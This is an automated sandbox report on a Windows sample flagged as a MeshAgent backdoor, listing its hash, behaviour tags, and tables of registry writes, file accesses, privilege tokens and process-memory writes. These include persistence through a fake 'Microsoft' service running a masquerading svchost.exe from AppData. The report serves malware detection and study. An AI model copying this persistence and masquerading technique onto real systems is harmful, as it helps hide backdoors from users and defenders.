Malware Analysis Report

2024-10-19 07:44

Sample ID 241012-hv884syhqh
Target 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch
SHA256 c4c71ad59b09f47d5d8c1f1ba54a358d1793706f00651867fb171e8f4d2912b4
Tags meshagent backdoor discovery execution persistence rat trojan upx
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 c4c71ad59b09f47d5d8c1f1ba54a358d1793706f00651867fb171e8f4d2912b4

Threat Level: Known bad

The file 2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch was found to be: Known bad.

Malicious Activity Summary

meshagent backdoor discovery execution persistence rat trojan upx

MeshAgent

Detects MeshAgent payload

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Executes dropped EXE

Checks installed software on the system

Drops file in System32 directory

UPX packed file

Unsigned PE

Program crash

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-12 07:04

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-10-12 07:04

Reported

2024-10-12 07:07

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-12 07:04

Reported

2024-10-12 07:07

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"

Signatures

Detects MeshAgent payload


MeshAgent

rat trojan backdoor meshagent

Downloads MZ/PE file

Sets service image path in registry

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\"" | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\combase.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\ws2_32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\bcryptprimitives.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\kernelbase.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\crypt32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6F20C0854D11B015FEDD40C59EF0A2A2E0285DD3 | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\advapi32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\win32u.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\ole32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\bcrypt.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Kernel.Appcore.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\Kernel.Appcore.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\exe\svchost.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\ntdll.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\kernelbase.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\advapi32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\advapi32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\rpcrt4.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\crypt32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\combase.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\svchost.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\kernel32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\DLL\iphlpapi.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\DLL\bcrypt.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\shcore.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\shcore.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\shell32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\iphlpapi.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\rpcrt4.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\crypt32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\shell32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\gdiplus.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\622B9A99354424DAA4C2EB7967BD870CBE07C969 | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\ntdll.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\kernelbase.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\shell32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\msvcrt.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\gdi32full.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\win32u.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dbghelp.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\ncrypt.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\DLL\dbgcore.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\AD743BF6CD010272FEF925B0B1EE6A8A05B70C73 | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\sechost.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\ucrtbase.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\comctl32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\dbghelp.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\622B9A99354424DAA4C2EB7967BD870CBE07C969 | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\msvcrt.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\user32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\combase.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\dbghelp.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\gdiplus.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\ntasn1.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\sechost.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\msvcp_win.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\gdi32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\msvcp_win.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\ole32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\ucrtbase.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\gdi32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
File opened for modification | C:\Windows\System32\dll\ole32.pdb | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A

UPX packed file

upx

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133731902928711239" | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\local\svchost\svchost.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\wbem\wmic.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4588 wrote to memory of 3636 | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4588 wrote to memory of 3636 | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4588 wrote to memory of 4564 | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe | C:\Windows\system32\cmd.exe
PID 4588 wrote to memory of 4564 | N/A | C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe | C:\Windows\system32\cmd.exe
PID 4564 wrote to memory of 3564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\explorer.exe
PID 4564 wrote to memory of 3564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\explorer.exe
PID 3636 wrote to memory of 764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3388 wrote to memory of 60 | N/A | C:\Windows\explorer.exe | C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
PID 3388 wrote to memory of 60 | N/A | C:\Windows\explorer.exe | C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
PID 3388 wrote to memory of 60 | N/A | C:\Windows\explorer.exe | C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
PID 3636 wrote to memory of 376 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 376 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 2368 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 2368 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 3176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3636 wrote to memory of 3176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
